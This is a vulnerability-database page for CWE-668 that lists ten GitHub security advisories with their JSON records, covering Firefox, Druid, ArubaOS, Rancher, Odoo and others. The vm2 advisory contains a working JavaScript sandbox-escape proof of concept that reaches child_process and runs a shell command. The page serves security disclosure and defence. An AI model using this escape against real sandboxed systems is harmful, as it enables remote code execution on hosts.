CWE-668
DiscouragedExposure of Resource to Wrong Sphere
Abstraction: Class · Status: Draft
The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource.
1251 vulnerabilities reference this CWE, most recent first.
GHSA-9M9W-3428-H4CQ
Vulnerability from github – Published: 2022-05-24 17:45 – Updated: 2022-07-13 00:01If an attacker is able to alter specific about:config values (for example malware running on the user's computer), the Devtools remote debugging feature could have been enabled in a way that was unnoticable to the user. This would have allowed a remote attacker (able to make a direct network connection to the victim) to monitor the user's browsing activity and (plaintext) network traffic. This was addressed by providing a visual cue when Devtools has an open network socket. This vulnerability affects Firefox < 87.
{
"affected": [],
"aliases": [
"CVE-2021-23985"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-03-31T14:15:00Z",
"severity": "MODERATE"
},
"details": "If an attacker is able to alter specific about:config values (for example malware running on the user\u0027s computer), the Devtools remote debugging feature could have been enabled in a way that was unnoticable to the user. This would have allowed a remote attacker (able to make a direct network connection to the victim) to monitor the user\u0027s browsing activity and (plaintext) network traffic. This was addressed by providing a visual cue when Devtools has an open network socket. This vulnerability affects Firefox \u003c 87.",
"id": "GHSA-9m9w-3428-h4cq",
"modified": "2022-07-13T00:01:10Z",
"published": "2022-05-24T17:45:59Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23985"
},
{
"type": "WEB",
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1659129"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202104-10"
},
{
"type": "WEB",
"url": "https://www.mozilla.org/security/advisories/mfsa2021-10"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-9MRV-M6P6-5V76
Vulnerability from github – Published: 2022-07-01 00:01 – Updated: 2022-07-12 00:00In a openshift node, there is a cron job to update mcollective facts that mishandles a temporary file. This may lead to loss of confidentiality and integrity.
{
"affected": [],
"aliases": [
"CVE-2013-4561"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-06-30T19:15:00Z",
"severity": "CRITICAL"
},
"details": "In a openshift node, there is a cron job to update mcollective facts that mishandles a temporary file. This may lead to loss of confidentiality and integrity.",
"id": "GHSA-9mrv-m6p6-5v76",
"modified": "2022-07-12T00:00:54Z",
"published": "2022-07-01T00:01:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2013-4561"
},
{
"type": "WEB",
"url": "https://github.com/openshift/origin-server/commit/f1abe972794e35a4bfba597694ce829990f14d39"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1029652"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-9P5G-VG43-MJ5R
Vulnerability from github – Published: 2021-09-27 20:13 – Updated: 2023-09-26 13:13In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.druid:druid-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.22.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-36749"
],
"database_specific": {
"cwe_ids": [
"CWE-668",
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2021-09-27T19:20:40Z",
"nvd_published_at": "2021-09-24T10:15:00Z",
"severity": "MODERATE"
},
"details": "In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.",
"id": "GHSA-9p5g-vg43-mj5r",
"modified": "2023-09-26T13:13:17Z",
"published": "2021-09-27T20:13:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36749"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-793h-6f7r-6qvm"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r304dfe56a5dfe1b2d9166b24d2c74ad1c6730338b20aef77a00ed2be@%3Cannounce.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/rc9400a70d0ec5cdb8a3486fc5ddb0b5282961c0b63e764abfbcb9f5d%40%3Cdev.druid.apache.org%3E"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Druid ingestion system Authenticated users can read data from other sources than intended "
}
GHSA-9P98-FMFQ-XHXP
Vulnerability from github – Published: 2023-03-01 09:30 – Updated: 2023-03-10 21:30An authenticated information disclosure vulnerability exists in the ArubaOS web-based management interface. Successful exploitation of this vulnerability results in the ability to read arbitrary files in the underlying operating system.
{
"affected": [],
"aliases": [
"CVE-2023-22777"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-03-01T08:15:00Z",
"severity": "MODERATE"
},
"details": "An authenticated information disclosure vulnerability exists in the ArubaOS web-based management interface. Successful exploitation of this vulnerability results in the ability to read arbitrary files in the underlying operating system.",
"id": "GHSA-9p98-fmfq-xhxp",
"modified": "2023-03-10T21:30:25Z",
"published": "2023-03-01T09:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-22777"
},
{
"type": "WEB",
"url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-002.txt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-9PPM-VMXX-M22X
Vulnerability from github – Published: 2022-05-24 19:05 – Updated: 2022-05-24 19:05Information Disclosure in NoneCMS v1.3 allows remote attackers to obtain sensitive information via the component "/public/index.php".
{
"affected": [],
"aliases": [
"CVE-2020-18646"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-06-22T15:15:00Z",
"severity": "HIGH"
},
"details": "Information Disclosure in NoneCMS v1.3 allows remote attackers to obtain sensitive information via the component \"/public/index.php\".",
"id": "GHSA-9ppm-vmxx-m22x",
"modified": "2022-05-24T19:05:52Z",
"published": "2022-05-24T19:05:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-18646"
},
{
"type": "WEB",
"url": "https://github.com/PearlyNautilus/Security-Code-Review/issues/5"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-9QJ6-QJGG-37QQ
Vulnerability from github – Published: 2026-05-08 15:58 – Updated: 2026-05-14 20:37Summary
VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.
Details
The new method neutralizeArraySpeciesBatch works with objects from the other side but can call into this side via getter on the array prototype exposing objects of the wrong side into the sandbox. This can be used to get host objects and get the host Function object.
PoC
const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
const a = [];
Object.defineProperty(Array.prototype, 0, {
set(value) {
a.f = Buffer.prototype.inspect;
value.arr.f.constructor.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
}
});
new Buffer(a);
`));
Impact
Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.11.1"
},
"package": {
"ecosystem": "npm",
"name": "vm2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.11.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44008"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-08T15:58:48Z",
"nvd_published_at": "2026-05-13T18:16:17Z",
"severity": "CRITICAL"
},
"details": "### Summary\n\nVM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.\n\n### Details\n\nThe new method `neutralizeArraySpeciesBatch` works with objects from the other side but can call into this side via getter on the array prototype exposing objects of the wrong side into the sandbox. This can be used to get host objects and get the host `Function` object.\n\n### PoC\n\n```js\nconst {VM} = require(\"vm2\");\nconst vm = new VM();\nconsole.log(vm.run(`\nconst a = [];\nObject.defineProperty(Array.prototype, 0, {\n\tset(value) {\n\t\ta.f = Buffer.prototype.inspect;\n\t\tvalue.arr.f.constructor.constructor(\"return process\")().mainModule.require(\u0027child_process\u0027).execSync(\u0027touch pwned\u0027);\n\t}\n});\nnew Buffer(a);\n`));\n```\n\n### Impact\n\nAttackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.",
"id": "GHSA-9qj6-qjgg-37qq",
"modified": "2026-05-14T20:37:08Z",
"published": "2026-05-08T15:58:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-9qj6-qjgg-37qq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44008"
},
{
"type": "PACKAGE",
"url": "https://github.com/patriksimek/vm2"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "vm2 has sandbox breakout via `neutralizeArraySpeciesBatch`"
}
GHSA-9QQ2-XHMC-H9QR
Vulnerability from github – Published: 2021-06-23 17:57 – Updated: 2022-04-25 20:20An issue was discovered in Rancher 2 through 2.1.5. Any project member with access to the default namespace can mount the netes-default service account in a pod, and then use that pod to execute administrative privileged commands against the k8s cluster. This could be mitigated by isolating the default namespace in a separate project, where only cluster admins can be given permissions to access. As of 2018-12-20, this bug affected ALL clusters created or imported by Rancher.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/rancher/rancher"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.1.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2018-20321"
],
"database_specific": {
"cwe_ids": [
"CWE-288",
"CWE-668"
],
"github_reviewed": true,
"github_reviewed_at": "2021-05-12T18:10:58Z",
"nvd_published_at": "2019-04-10T14:29:00Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in Rancher 2 through 2.1.5. Any project member with access to the default namespace can mount the netes-default service account in a pod, and then use that pod to execute administrative privileged commands against the k8s cluster. This could be mitigated by isolating the default namespace in a separate project, where only cluster admins can be given permissions to access. As of 2018-12-20, this bug affected ALL clusters created or imported by Rancher.",
"id": "GHSA-9qq2-xhmc-h9qr",
"modified": "2022-04-25T20:20:41Z",
"published": "2021-06-23T17:57:10Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-20321"
},
{
"type": "WEB",
"url": "https://github.com/rancher/rancher/commit/6ea187fcc2309d5a7a14ed47de5688bf6573f448"
},
{
"type": "WEB",
"url": "https://forums.rancher.com/c/announcements"
},
{
"type": "PACKAGE",
"url": "https://github.com/rancher/rancher"
},
{
"type": "WEB",
"url": "https://github.com/rancher/rancher/releases/tag/v2.1.6"
},
{
"type": "WEB",
"url": "https://rancher.com/blog/2019/2019-01-29-explaining-security-vulnerabilities-addressed-in-rancher-v2-1-6-and-v2-0-11"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Access Control Bypass"
}
GHSA-9R73-4W68-QFRW
Vulnerability from github – Published: 2022-08-23 00:00 – Updated: 2022-08-25 00:00Dell PowerScale OneFS, versions 9.0.0 up to and including 9.1.0.19, 9.2.1.12, 9.3.0.6, and 9.4.0.2, contain a process invoked with sensitive information vulnerability. A CLI user may potentially exploit this vulnerability, leading to information disclosure.
{
"affected": [],
"aliases": [
"CVE-2022-31238"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-08-22T17:15:00Z",
"severity": "MODERATE"
},
"details": "Dell PowerScale OneFS, versions 9.0.0 up to and including 9.1.0.19, 9.2.1.12, 9.3.0.6, and 9.4.0.2, contain a process invoked with sensitive information vulnerability. A CLI user may potentially exploit this vulnerability, leading to information disclosure.",
"id": "GHSA-9r73-4w68-qfrw",
"modified": "2022-08-25T00:00:28Z",
"published": "2022-08-23T00:00:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31238"
},
{
"type": "WEB",
"url": "https://www.dell.com/support/kbdoc/en-gh/000201094/dsa-2022-149-dell-emc-powerscale-onefs-security-update"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-9RMR-65MH-RJ57
Vulnerability from github – Published: 2022-05-24 17:38 – Updated: 2022-05-24 17:38Dell Inspiron 5675 BIOS versions prior to 1.4.1 contain a UEFI BIOS RuntimeServices overwrite vulnerability. A local attacker with access to system memory may exploit this vulnerability by overwriting the RuntimeServices structure to execute arbitrary code in System Management Mode (SMM).
{
"affected": [],
"aliases": [
"CVE-2020-26186"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-01-08T19:15:00Z",
"severity": "HIGH"
},
"details": "Dell Inspiron 5675 BIOS versions prior to 1.4.1 contain a UEFI BIOS RuntimeServices overwrite vulnerability. A local attacker with access to system memory may exploit this vulnerability by overwriting the RuntimeServices structure to execute arbitrary code in System Management Mode (SMM).",
"id": "GHSA-9rmr-65mh-rj57",
"modified": "2022-05-24T17:38:20Z",
"published": "2022-05-24T17:38:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26186"
},
{
"type": "WEB",
"url": "https://www.dell.com/support/kbdoc/en-us/000180645/dsa-2020-247-dell-client-platform-security-update-for-uefi-bios-runtimeservices-overwrite-vulnerability"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-9RP8-HCMG-4F3F
Vulnerability from github – Published: 2022-05-24 17:37 – Updated: 2022-05-24 17:37Improper access control in mail module (notifications) in Odoo Community 14.0 and earlier and Odoo Enterprise 14.0 and earlier, allows remote authenticated users to obtain access to arbitrary messages in conversations they were not a party to.
{
"affected": [],
"aliases": [
"CVE-2019-11784"
],
"database_specific": {
"cwe_ids": [
"CWE-668",
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-12-22T17:15:00Z",
"severity": "MODERATE"
},
"details": "Improper access control in mail module (notifications) in Odoo Community 14.0 and earlier and Odoo Enterprise 14.0 and earlier, allows remote authenticated users to obtain access to arbitrary messages in conversations they were not a party to.",
"id": "GHSA-9rp8-hcmg-4f3f",
"modified": "2022-05-24T17:37:00Z",
"published": "2022-05-24T17:37:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-11784"
},
{
"type": "WEB",
"url": "https://github.com/odoo/odoo/issues/63709"
}
],
"schema_version": "1.4.0",
"severity": []
}
No mitigation information available for this CWE.
No CAPEC attack patterns related to this CWE.